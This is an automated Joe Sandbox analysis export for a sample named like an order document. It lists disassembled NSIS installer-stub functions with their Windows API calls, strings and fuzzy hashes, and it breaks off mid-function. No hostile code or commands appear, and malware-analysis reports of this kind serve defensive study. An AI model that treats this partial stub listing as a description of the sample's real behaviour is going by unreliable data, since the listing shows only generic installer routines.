GetClientRect.USER32(?,?), ref: 004055BA
GetSystemMetrics.USER32(00000002), ref: 004055C1
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
ShowWindow.USER32(?,00000008), ref: 0040565D
GetDlgItem.USER32(?,000003EC), ref: 0040567E
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
GetDlgItem.USER32(?,000003F8), ref: 0040558C

Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404545), ref: 00404370

GetDlgItem.USER32(?,000003EC), ref: 004056CF
CreateThread.KERNEL32(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
CloseHandle.KERNEL32(00000000), ref: 004056E4
ShowWindow.USER32(00000000), ref: 00405707
ShowWindow.USER32(?,00000008), ref: 0040570E
ShowWindow.USER32(00000008), ref: 00405754
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
CreatePopupMenu.USER32 ref: 00405799
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
GetWindowRect.USER32(?,000000FF), ref: 004057CE
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
OpenClipboard.USER32(00000000), ref: 00405833
EmptyClipboard.USER32 ref: 00405839
GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
GlobalLock.KERNEL32(00000000), ref: 0040584C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
GlobalUnlock.KERNEL32(00000000), ref: 00405879
SetClipboardData.USER32(00000001,00000000), ref: 00405884
CloseClipboard.USER32 ref: 0040588A

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 5446ea96ddb436275efc3b28b3f9a19d11684790575015aa8393a95bc5bcfc0a
Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
Opcode Fuzzy Hash: 5446ea96ddb436275efc3b28b3f9a19d11684790575015aa8393a95bc5bcfc0a
Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68

Function 00403A96 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2

lstrcatA.KERNEL32(00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410,00436400,?,00435000,0000000A,0000000C), ref: 00403B11
lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,00435400,00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,763F3410), ref: 00403B86
lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
GetFileAttributesA.KERNEL32(0042DFC0,?,00435000,0000000A,0000000C), ref: 00403BA4
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403BED

Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8

RegisterClassA.USER32(0042E7C0), ref: 00403C2A
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
ShowWindow.USER32(00000005,00000000,?,00435000,0000000A,0000000C), ref: 00403CAD
GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
RegisterClassA.USER32(0042E7C0), ref: 00403CEF
DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E

Strings

RichEdit20A, xrefs: 00403CD1, 00403CD7
RichEd32, xrefs: 00403CC1
_Nb, xrefs: 00403C09, 00403C71
Control Panel\Desktop\ResourceLocale, xrefs: 00403ACA
.DEFAULT\Control Panel\International, xrefs: 00403AFC
RichEd20, xrefs: 00403CB3
.exe, xrefs: 00403B93
RichEdit, xrefs: 00403CE0

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2904746566
Opcode ID: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
Opcode Fuzzy Hash: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

Function 00404498 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
GetDlgItem.USER32(00000000,000003E8), ref: 00404537
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
GetSysColor.USER32(?), ref: 00404566
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
lstrlenA.KERNEL32(?), ref: 00404587
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
GetDlgItem.USER32(?,0000040A), ref: 0040460D
SendMessageA.USER32(00000000), ref: 00404610
GetDlgItem.USER32(?,000003E8), ref: 0040463B
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
SetCursor.USER32(00000000), ref: 00404693
LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
SetCursor.USER32(00000000), ref: 004046AC
SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC

Strings

N, xrefs: 00404629
cD@, xrefs: 00404697

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$cD@
API String ID: 3103080414-2800326580
Opcode ID: 75ce07d81b87f19cb41c34616794e8af2c5473200a6a9bd430623a0a6f6a9a22
Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
Opcode Fuzzy Hash: 75ce07d81b87f19cb41c34616794e8af2c5473200a6a9bd430623a0a6f6a9a22
Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98

Function 004041A6 Relevance: 30.2, APIs: 20, Instructions: 185windowstringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000003), ref: 004040E7
ShowWindow.USER32(00000000,?,?,00000003,?,FFFFFC1A), ref: 00404108
EnableWindow.USER32(?), ref: 0040411A
EnableWindow.USER32(?,?), ref: 00404135
GetSystemMenu.USER32(?,?,0000F060,00000001,?,?,?,?,?,00000003,?,FFFFFC1A), ref: 0040414B
EnableMenuItem.USER32(00000000), ref: 00404152
SendMessageA.USER32(?,000000F4,?,00000001), ref: 0040416A
SendMessageA.USER32(?,00000401,00000002), ref: 0040417D
lstrlenA.KERNEL32 ref: 004041A7
SetWindowTextA.USER32 ref: 004041B6
DestroyWindow.USER32(?,?,?,?,00000000), ref: 004041FE
CreateDialogParamA.USER32(?), ref: 00404232

Part of subcall function 0040432D: SetDlgItemTextA.USER32(?,?,00000000), ref: 00404347

GetDlgItem.USER32(?,000003FA), ref: 0040425B
GetWindowRect.USER32(00000000), ref: 00404262
ScreenToClient.USER32(?,?), ref: 0040426E
SetWindowPos.USER32(?,?,?,?,?,00000015,?,?,?,000003FA,?,00000000,00000006,?), ref: 00404287

Part of subcall function 00401389: MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
Part of subcall function 00401389: SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

ShowWindow.USER32(00000008,?,?,?,?,?,?,?,00000015,?,?,?,000003FA,?,00000000,00000006), ref: 004042A6

Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B

ShowWindow.USER32(?,0000000A), ref: 004042EA

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Window$ItemMessageSend$EnableShow$MenuText$ClientCreateDestroyDialogParamRectScreenSystemlstrlen
String ID:
API String ID: 2455617345-0
Opcode ID: 846ef0a16da82fb72dcc369e0bcd13bf655e9269ee6fb99affdbd61b3a76df5f
Instruction ID: 17cfa9595181ccc4bc0251f22000ce502e63d694493c87bc0f861762768a06eb
Opcode Fuzzy Hash: 846ef0a16da82fb72dcc369e0bcd13bf655e9269ee6fb99affdbd61b3a76df5f
Instruction Fuzzy Hash: 9951B4B1200305EFD7216F51EE45E2A37B8FB94345B90053EF682B11B1CB799852DB2D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4

Function 00405EF6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30

Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7

GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
wsprintfA.USER32 ref: 00405F6B
GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
GlobalFree.KERNEL32(00000000), ref: 00406054
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B

Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46

Strings

[Rename], xrefs: 00405FD5, 00405FE7
%s=%s, xrefs: 00405F61

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
Opcode Fuzzy Hash: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD

Function 004047BF Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040480E
SetWindowTextA.USER32(00000000,?), ref: 00404838
SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
CoTaskMemFree.OLE32(00000000), ref: 004048F4
lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944

Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A

Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
Part of subcall function 00406587: CharNextA.USER32(0000000C,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601

GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D

Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F

Strings

A, xrefs: 004048E2

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 9d37722e02853d44da5e9115b2c3eafaccc869e0b6c7a3f858c5b4d6c4529409
Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
Opcode Fuzzy Hash: 9d37722e02853d44da5e9115b2c3eafaccc869e0b6c7a3f858c5b4d6c4529409
Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D

Function 00402F31 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402F42
GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E

Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
GlobalAlloc.KERNEL32(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0

Strings

Error launching installer, xrefs: 00402F81
soft, xrefs: 0040301F
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
Null, xrefs: 00403028
8TA, xrefs: 00402FBF
Inst, xrefs: 00403016

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: 8TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1977864323
Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

Function 00406320 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 208stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,00429C68,00000000,00405409,00429C68,00000000,00000000), ref: 00406468
SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064C7
CoTaskMemFree.OLE32(00000000,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064D0
lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064F4
lstrlenA.KERNEL32(0042DFC0,?,00429C68,00000000,00405409,00429C68,00000000,00000000,?,763F23A0), ref: 00406546

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
Opcode Fuzzy Hash: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

Function 00404394 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004043B1
GetSysColor.USER32(00000000), ref: 004043EF
SetTextColor.GDI32(?,00000000), ref: 004043FB
SetBkMode.GDI32(?,?), ref: 00404407
GetSysColor.USER32(?), ref: 0040441A
SetBkColor.GDI32(?,?), ref: 0040442A
DeleteObject.GDI32(?), ref: 00404444
CreateBrushIndirect.GDI32(?), ref: 0040444E

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58

Function 004053D1 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,763F23A0), ref: 0040542D
SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
Opcode Fuzzy Hash: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

Function 00404C80 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
GetMessagePos.USER32 ref: 00404CA3
ScreenToClient.USER32(?,?), ref: 00404CBD
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
